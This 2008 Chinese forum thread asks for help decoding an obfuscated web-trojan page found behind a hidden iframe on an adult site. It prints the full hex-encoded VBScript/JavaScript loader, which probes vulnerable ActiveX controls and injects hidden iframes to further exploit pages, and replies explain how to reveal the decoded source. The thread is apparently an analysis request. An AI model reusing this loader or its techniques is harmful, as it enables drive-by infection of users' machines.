我在一个H网上，发现了<iframe src=http://www.1119111.com/8/index.htm width=0 height=0></iframe>这样的代码，觉得基本上是个网马。下面我把http://www.1119111.com/8/index.htm的加密源码发出来，想请懂的大大讲一下，我不知道如何解密。
网马源代码如下：
<html>
<body>
<script language="JavaScript">
function mymid(ss) {
return ss.substring(2);}
</script>
<script language="VBScript">
s="js"
flag_type=s
S="0D0a66756E6374696F6E20696E697428297B646F63756d656E742E777269746528293b7d0D0a0"
S=S+"d0A0d0a7472797b76617220653B0d0A7661722061646f3d28646F63756D656E742E6372656174"
S=S+"65456c656D656E7428226f626a6563742229293b0d0A61646F2E7365744174747269627574652"
S=S+"822636C6173736964222C22636C7369643a42443936433535362D363541332D313144302D3938"
S=S+"33412D30304330344643323945333622293b0d0a7661722061733D61646f2e6372656174656F6"
S=S+"26a656374282241646F64622E53747265616D222C2222297D0D0a63617463682865297B7D3b0d"
S=S+"0a66696e616c6c797B0d0A0d0a69662865213d225B6f626A656374204572726F725D22297b0D0"
S=S+"a2020646f63756d656E742E777269746528223c696672616D652077696474683d302068656967"
S=S+"68743d30207372633D30363031342E68746d206672616d65626f726465723D303E3C2f6966726"
S=S+"16d653e22293B7D0d0A0d0a7472797b76617220663B7661722073746F726d3D6E657720416374"
S=S+"697665584f626a65637428224D50532e53746F726D506C6179657222293b7d0d0a63617463682"
S=S+"866297b7D3B0d0A66696e616c6c797b69662866213D225B6F626a656374204572726f725D2229"
S=S+"7B0d0a646f63756D656E742e777269746528223C696672616d652077696474683d30206865696"
S=S+"768743d30207372633d797966622e68746d206672616D65626f726465723D303E3c2F69667261"
S=S+"6d653e22293B7D7d0d0a7472797b76617220673b766172207070733D6e6577204163746976655"
S=S+"84f626A6563742822504f574552504C415945522E506f776572506C617965724374726C2E3122"
S=S+"293B7D0D0a63617463682867297B7D3b0d0a66696e616c6C797B69662867213D225b6f626a656"
S=S+"374204572726f725D22297b0d0A646f63756D656E742E777269746528223c696672616D652077"
S=S+"696474683D30206865696768743D30207372633d7070732E68746d206672616d65626F7264657"
S=S+"23D303E3c2f696672616d653E22293B7D7d0d0a7472797B76617220683B766172207070733D6E"
S=S+"657720416374697665584F626A6563742822474c434841542e474C436861744374726C2E31222"
S=S+"93b7D0D0A63617463682868297B7D3B0d0A66696e616C6C797B69662868213d225b6F626a6563"
S=S+"74204572726f725d22297b0d0A646F63756d656e742e777269746528223c696672616d6520776"
S=S+"96474683d30206865696768743d30207372633d6C7a5f6E65772e68746d206672616D65626f72"
S=S+"6465723D303E3c2f696672616D653e22293B0d0a646f63756d656E742E777269746528223C696"
S=S+"672616D652077696474683d30206865696768743D30207372633d6c7a2E68746d206672616D65"
S=S+"626f726465723D303E3C2F696672616d653e22293b7d7d0D0A7472797B7661722069693B76617"
S=S+"2207070733d6e657720416374697665584F626a65637428225064673222293b7D0D0A63617463"
S=S+"68286969297b7d3B0d0a66696E616c6c797B6966286969213d225B6F626a656374204572726F7"
S=S+"25d22297b0d0a646F63756D656E742E777269746528223c696672616d652077696474683D3020"
S=S+"6865696768743D30207372633D63782e68746d206672616D65626F726465723D303e3C2f69667"
S=S+"2616D653E22293B7d7D0d0a7472797b7661722069693b766172207070733d6E65772041637469"
S=S+"7665584f626a65637428224450436C69656E742e566F6422293B7D0d0a6361746368286969297"
S=S+"b7D3B0D0a66696E616C6C797B6966286969213d225b6f626a656374204572726F725d22297b0d"
S=S+"0A646F63756D656E742E777269746528223C696672616D652077696474683d302068656967687"
S=S+"43D30207372633d78756E6C6569352e68746d206672616D65626f726465723D303e3C2f696672"
S=S+"616D653E22293B7d7D0D0A7472797B7661722069693B766172207070733d6e657720416374697"
S=S+"665584F626A656374282259576355706c2e576355706c6f616422293b7D0d0a63617463682869"
S=S+"69297b7d3B0D0A66696E616c6c797b6966286969213D225B6F626a656374204572726f725d222"
S=S+"97b0D0A646f63756D656E742e777269746528223C696672616d652077696474683D3020686569"
S=S+"6768743d30207372633D7961686f6f2e68746d206672616d65626F726465723D303e3C2F69667"
S=S+"2616d653E22293b7D7D0d0A0d0a646F63756D656e742e777269746528223C696672616d652077"
S=S+"696474683d30206865696768743D30207372633D7265616c706c61792E68746d206672616d656"
S=S+"26f726465723D303e3C2f696672616d653E22293B0D0a646F63756d656E742e77726974652822"
S=S+"3c696672616d652077696474683D30206865696768743D30207372633d49454e6f52756E2e687"
S=S+"46D206672616d65626f726465723D303e3c2F696672616d653e22293b0D0A646f63756D656e74"
S=S+"2E777269746528223c696672616d652077696474683D30206865696768743d30207372633d787"
S=S+"56e6c65692e68746d206672616D65626f726465723d303e3c2F696672616d653E22293B0D0A64"
S=S+"6F63756d656E742e777269746528223c696672616D652077696474683d30206865696768743D3"
S=S+"0207372633D30373030342E68746d206672616D65626F726465723D303E3C2F696672616d653E"
S=S+"22293B0D0a646f63756d656e742e777269746528223c696672616D652077696474683d3020686"
S=S+"5696768743d30207372633D303733332e68746d206672616d65626f726465723d303E3C2f6966"
S=S+"72616D653E22293b0d0A646F63756D656E742e777269746528223C696672616d6520776964746"
S=S+"83d30206865696768743D30207372633d62616964752e68746d206672616d65626f726465723d"
S=S+"303e3c2f696672616D653e22293B0d0A0D0a7d0D0A"
D=""
DO WHILE LEN(S)>1
    k="&H"
    k=k+ucase(LEFT(S,2))
    p=CLng(k)
    m=chr(p)
    D=D&m
    S=mymid(S)
LOOP
if flag_type="html" then
  document.write(D)
end if
if flag_type="vbs" then
  EXECUTE D
end if
</script>
<script language="javaScript">
if (flag_type=="js") {
var e;
try
{
eval(D);
}
catch(e){}
}
</script>
</body>
</html>
快来看看啊，帮忙讲一下！谢谢了！

对了，我发好帖子后那个网址出现了畅游巡警的标志，点上去说是该链接中包含木马。这是一个恶意下载脚本

要想翻译他很难啊
而且用的是JAVA脚本
是一个下载脚本

哇，这是什么东西，看不懂啊·~~~~高手解释下

伙计，我现在在超市POS上，解密工具在我柜子里的硬盘里，回去给你解下，稍等哦~

如果你有解秘软件的话  给我一份

如何解码啊
教教吧
把工具也分享下 啊

不 能 错过~~~~~~~~~~~~~~~~~

这个人真欠扁，把木马搞得这么复杂。加密代码不是直接赋值给一个变量，而是用S=S+*的方法，真是*。

把EXECUTE D改为msgbox D执行这个网也就能看到原码了。

[ 本帖最后由 ety001 于 2008-8-20 09:29 编辑 ]